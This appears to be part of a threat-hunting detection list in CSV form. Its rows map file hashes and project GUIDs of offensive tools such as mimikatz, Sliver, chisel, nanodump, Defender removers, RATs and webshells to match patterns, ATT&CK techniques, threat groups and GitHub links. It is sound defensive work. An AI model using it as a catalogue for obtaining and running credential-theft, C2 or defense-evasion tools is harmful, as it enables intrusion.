"*909cb2ae71b22db86c4232041f32352ff94db59760593ada386bde5b4dc8901a*",".{0,1000}909cb2ae71b22db86c4232041f32352ff94db59760593ada386bde5b4dc8901a.{0,1000}","offensive_tool_keyword","defender-control","An open-source windows defender manager. Now you can disable windows defender permanently","T1562.001 - T1562.004 - T1089","TA0005 - TA0002","N/A","LockBit","Defense Evasion","https://github.com/pgkt04/defender-control","1","0","#filehash","N/A","10","10","1614","128","2023-09-09T14:57:56Z","2021-05-15T10:09:17Z","31055"
"*90a2fd2951ffe73118f56f90197f378f17c2e79c38bb58a824f01293187fdca5*",".{0,1000}90a2fd2951ffe73118f56f90197f378f17c2e79c38bb58a824f01293187fdca5.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","31056"
"*90A6822C-4336-433D-923F-F54CE66BA98F*",".{0,1000}90A6822C\-4336\-433D\-923F\-F54CE66BA98F.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","#GUIDproject","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","31057"
"*90a9080ebaafb4fcf1deb6e6810b4cfc38e0c16b6c9849969aee3a23a730db5b*",".{0,1000}90a9080ebaafb4fcf1deb6e6810b4cfc38e0c16b6c9849969aee3a23a730db5b.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","31058"
"*90b52aad38a002bb07581fef1caf777ec188fe07dc0f55d828a21ad35ceca48f*",".{0,1000}90b52aad38a002bb07581fef1caf777ec188fe07dc0f55d828a21ad35ceca48f.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","31059"
"*90bb2613b2c711e20dce52480e998feda6e8488017e6f792b486616529cad8b2*",".{0,1000}90bb2613b2c711e20dce52480e998feda6e8488017e6f792b486616529cad8b2.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","31060"
"*90bf7beb921839957e7977851f01e757346d2b4f672e6a08b04e57878cd6efbf*",".{0,1000}90bf7beb921839957e7977851f01e757346d2b4f672e6a08b04e57878cd6efbf.{0,1000}","offensive_tool_keyword","AMSI-Provider","A fake AMSI Provider which can be used for persistence","T1546.013 - T1574.012","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/netbiosX/AMSI-Provider","1","0","#filehash","N/A","10","2","150","16","2021-05-16T16:56:15Z","2021-05-15T16:18:47Z","31062"
"*90c08dc1a2ec6ad65002990fe43220d8974c92a02c2639562447c98bdbc04a22*",".{0,1000}90c08dc1a2ec6ad65002990fe43220d8974c92a02c2639562447c98bdbc04a22.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","31063"
"*90c6e84dbeb83eef349d9ac17b1e005c12f42d74cea94a6c0f16a999792ac3f9*",".{0,1000}90c6e84dbeb83eef349d9ac17b1e005c12f42d74cea94a6c0f16a999792ac3f9.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","31064"
"*90c6e84dbeb83eef349d9ac17b1e005c12f42d74cea94a6c0f16a999792ac3f9*",".{0,1000}90c6e84dbeb83eef349d9ac17b1e005c12f42d74cea94a6c0f16a999792ac3f9.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","31065"
"*90ca6caa7db1d3998a25b3bbc22526452dd7114bc3b4a660a20f842f8ca50258*",".{0,1000}90ca6caa7db1d3998a25b3bbc22526452dd7114bc3b4a660a20f842f8ca50258.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","31066"
"*90DEB964-F2FB-4DB8-9BCA-7D5D10D3A0EB*",".{0,1000}90DEB964\-F2FB\-4DB8\-9BCA\-7D5D10D3A0EB.{0,1000}","offensive_tool_keyword","Tsunami","another C2 framework","T1573 - T1027 - T1059 - T1071 ","TA0011 - TA0009 - TA0003 - TA0007 - TA0008","N/A","N/A","C2","https://github.com/trustedsec/The_Shelf","1","0","#GUIDproject","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","31067"
"*90dfb88b36bbfab99ffae972aaf0d1959fd7729b11e7b5933486cd2848270fd6*",".{0,1000}90dfb88b36bbfab99ffae972aaf0d1959fd7729b11e7b5933486cd2848270fd6.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","31068"
"*90e0539704cfca45027b3bd74e1cb28cbe8a65367320ce0d58f2ef1b82d50c2a*",".{0,1000}90e0539704cfca45027b3bd74e1cb28cbe8a65367320ce0d58f2ef1b82d50c2a.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","31069"
"*90e2d1bb612d9658067799266605dff148b292dafd4f6ddff3e184a9b7998376*",".{0,1000}90e2d1bb612d9658067799266605dff148b292dafd4f6ddff3e184a9b7998376.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","31074"
"*90e767d5fd29fc406847b5ac6151a713643596625209245d3440fd8908ff7427*",".{0,1000}90e767d5fd29fc406847b5ac6151a713643596625209245d3440fd8908ff7427.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","Dispossessor","Credential Access","https://github.com/fortra/nanodump","1","0","#filehash","N/A","10","10","1918","249","2024-09-17T22:58:11Z","2021-11-10T18:28:15Z","31075"
"*90e8f7a8ab2ad07168666a368e3c9e3b1c8c0fc44257d693b76694959e7a1fb5*",".{0,1000}90e8f7a8ab2ad07168666a368e3c9e3b1c8c0fc44257d693b76694959e7a1fb5.{0,1000}","offensive_tool_keyword","File-Tunnel","Tunnel TCP connections through a file","T1071 - T1105 - T1090","TA0005 - TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/fiddyschmitt/File-Tunnel","1","0","#filehash","N/A","10","10","925","82","2025-04-19T15:06:09Z","2023-02-05T12:57:45Z","31076"
"*90edb0f25788a09d269aa4f51eb5a7e99d8e95e14ca1f5ab25a958dfcd5fc313*",".{0,1000}90edb0f25788a09d269aa4f51eb5a7e99d8e95e14ca1f5ab25a958dfcd5fc313.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","31077"
"*90f04f9b39cd932003faff204822ac0223a01ae2aa867d6e0992d63a8f40788d*",".{0,1000}90f04f9b39cd932003faff204822ac0223a01ae2aa867d6e0992d63a8f40788d.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","31079"
"*90F6244A-5EEE-4A7A-8C75-FA6A52DF34D3*",".{0,1000}90F6244A\-5EEE\-4A7A\-8C75\-FA6A52DF34D3.{0,1000}","offensive_tool_keyword","SharpLDAP","tool written in C# that aims to do enumeration via LDAP queries","T1018 - T1069.003","TA0007 - TA0011","N/A","N/A","Discovery","https://github.com/mertdas/SharpLDAP","1","0","#GUIDproject","N/A","8","1","0","1","2023-01-14T21:52:36Z","2022-11-16T00:38:43Z","31080"
"*90fcf63af14fcaee770bbf4f777845b46fc81a6c38ed966bb80c7b5078d46f17*",".{0,1000}90fcf63af14fcaee770bbf4f777845b46fc81a6c38ed966bb80c7b5078d46f17.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","31082"
"*910a0899cdb2824c3c5d3a3872196206c17077c24f520d6661b270358b922b6f*",".{0,1000}910a0899cdb2824c3c5d3a3872196206c17077c24f520d6661b270358b922b6f.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","31084"
"*910c0a93a65b356c7a9534332555c560285117859d771781f9aca7848a25f336*",".{0,1000}910c0a93a65b356c7a9534332555c560285117859d771781f9aca7848a25f336.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","31086"
"*9117d2d155a124e050aaf1c64011f5a65198f9dd91289ffcf809f8364740f1d5*",".{0,1000}9117d2d155a124e050aaf1c64011f5a65198f9dd91289ffcf809f8364740f1d5.{0,1000}","offensive_tool_keyword","AdaptixC2","C2- Adaptix is an extensible post-exploitation and adversarial emulation framework made for penetration testers","T1071 - T1105 - T1090 - T1568 - T1204 - T1566 - T1059","TA0011 - TA0010 - TA0008 - TA0002 - TA0001","N/A","N/A","C2","https://github.com/Adaptix-Framework/AdaptixC2","1","0","#filehash","N/A","10","10","547","114","2025-04-21T06:03:46Z","2024-08-21T18:07:05Z","31087"
"*911be80c0cbcc8c3bc351a3e60db0d7494858603*",".{0,1000}911be80c0cbcc8c3bc351a3e60db0d7494858603.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","N/A","10","10","779","125","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z","31089"
"*911db175f6d08bcc3c3f26bd5ea264434bb612533b8e7beceef307d35adf0f10*",".{0,1000}911db175f6d08bcc3c3f26bd5ea264434bb612533b8e7beceef307d35adf0f10.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","31090"
"*912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9*",".{0,1000}912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","31091"
"*912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9*",".{0,1000}912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","31092"
"*9120da326f6d13c492ca42da217b25a24515ca0d2f468acde8ddb5d5417c6652*",".{0,1000}9120da326f6d13c492ca42da217b25a24515ca0d2f468acde8ddb5d5417c6652.{0,1000}","offensive_tool_keyword","brutespray","BruteSpray takes nmap GNMAP/XML output or newline seperated JSONS and automatically brute-forces services with default credentials using Medusa. BruteSpray can even find non-standard ports by using the -sV inside Nmap.","T1110","TA0001 - TA0043","N/A","N/A","Credential Access","https://github.com/x90skysn3k/brutespray","1","0","#filehash","N/A","10","10","2231","405","2025-04-21T03:17:20Z","2017-04-05T17:05:10Z","31093"
"*9124efc00f77a6de28cc12e89c35e1eccde6523a5304556613c45c797b7efaeb*",".{0,1000}9124efc00f77a6de28cc12e89c35e1eccde6523a5304556613c45c797b7efaeb.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","31094"
"*91283687ba9f56c07f0664807a9387edd6f40e50607fc3c757bcd34b28eb1cd8*",".{0,1000}91283687ba9f56c07f0664807a9387edd6f40e50607fc3c757bcd34b28eb1cd8.{0,1000}","offensive_tool_keyword","gh0st","Malware RAT with keylogger - dll injection - C2 - Remote control","T1204.002 - T1071.001 - T1027 - T1036.005 - T1055.001 - T1005 - T1056.001 - T1074.001 - T1105 - T1562.001 - T1543.003 - T1547.001 - T1571 - T1573.001 - T1106 - T1219","TA0002 - TA0003 - TA0004 - TA0008 - TA0009 - TA0010 - TA0011","GhostRAT","N/A","Malware","https://github.com/sin5678/gh0st","1","0","#filehash","N/A","10","6","508","274","2013-05-08T21:17:26Z","2012-10-05T06:25:36Z","31095"
"*91292bac-72b4-4aab-9e5f-2bc1843c8ea3*",".{0,1000}91292bac\-72b4\-4aab\-9e5f\-2bc1843c8ea3.{0,1000}","offensive_tool_keyword","SharpWeb","SharpWeb - to export browser data including passwords - history - cookies - bookmarks and download records","T1555.003 - T1539 - T1602 - T1074.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/StarfireLab/SharpWeb","1","0","#GUIDproject","N/A","10","8","703","79","2024-11-15T07:05:34Z","2023-10-09T06:48:23Z","31096"
"*912a5d11b4160a54f83f94ae434abb5f5b85915aa208bf086195a57ddaaee651*",".{0,1000}912a5d11b4160a54f83f94ae434abb5f5b85915aa208bf086195a57ddaaee651.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","31097"
"*912ddcb057ae0b41311be77a00ad2952ab1521c12fc712284a4fbfb58f1105be*",".{0,1000}912ddcb057ae0b41311be77a00ad2952ab1521c12fc712284a4fbfb58f1105be.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","31098"
"*912f812564e87c31a162cfe0626f3a6cbc5b6864deedbfefc31f6d321859ade3*",".{0,1000}912f812564e87c31a162cfe0626f3a6cbc5b6864deedbfefc31f6d321859ade3.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","#filehash","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","31099"
"*91302dd386709f514908c61d52d0e917ef6c4db866ee9f9f1b387ceb1e87cd7a*",".{0,1000}91302dd386709f514908c61d52d0e917ef6c4db866ee9f9f1b387ceb1e87cd7a.{0,1000}","offensive_tool_keyword","PassTheChallenge","Recovering NTLM hashes from Credential Guard","T1003 - T1555.002","TA0006 - TA0005","N/A","N/A","Exploitation tool","https://github.com/ly4k/PassTheChallenge","1","0","#filehash","N/A","9","4","334","21","2022-12-26T01:09:18Z","2022-12-26T00:56:40Z","31100"
"*9131d13db3cdf4fd6578488dda52fe4d714f4d20c8266f22d1113e049f1e4a53*",".{0,1000}9131d13db3cdf4fd6578488dda52fe4d714f4d20c8266f22d1113e049f1e4a53.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","31101"
"*91338f8ea41d0175c0c1cb5a15effe05b35378ec5a3596ca3cca7fee9e3369e9*",".{0,1000}91338f8ea41d0175c0c1cb5a15effe05b35378ec5a3596ca3cca7fee9e3369e9.{0,1000}","offensive_tool_keyword","Lime-RAT","remote administration tool for Windows (RAT)","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","APT-C-36 - Operation Comando","Malware","https://github.com/NYAN-x-CAT/Lime-RAT","1","0","#filehash","N/A","10","10","1086","413","2019-06-24T17:05:48Z","2018-02-07T15:35:56Z","31102"
"*913a1f53ad58f76c2ebd3952974eacbb24e01a5b3206a4079b1b111416a70d46*",".{0,1000}913a1f53ad58f76c2ebd3952974eacbb24e01a5b3206a4079b1b111416a70d46.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","31104"
"*913d774e5cf0bfad4adfa900997f7a1a*",".{0,1000}913d774e5cf0bfad4adfa900997f7a1a.{0,1000}","offensive_tool_keyword","cobaltstrike","CobaltStrike4.4 one-click deployment script Randomly generate passwords. keys. port numbers. certificates. etc.. to solve the problem that cs4.x cannot run on Linux and report errors Gray often ginkgo design","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 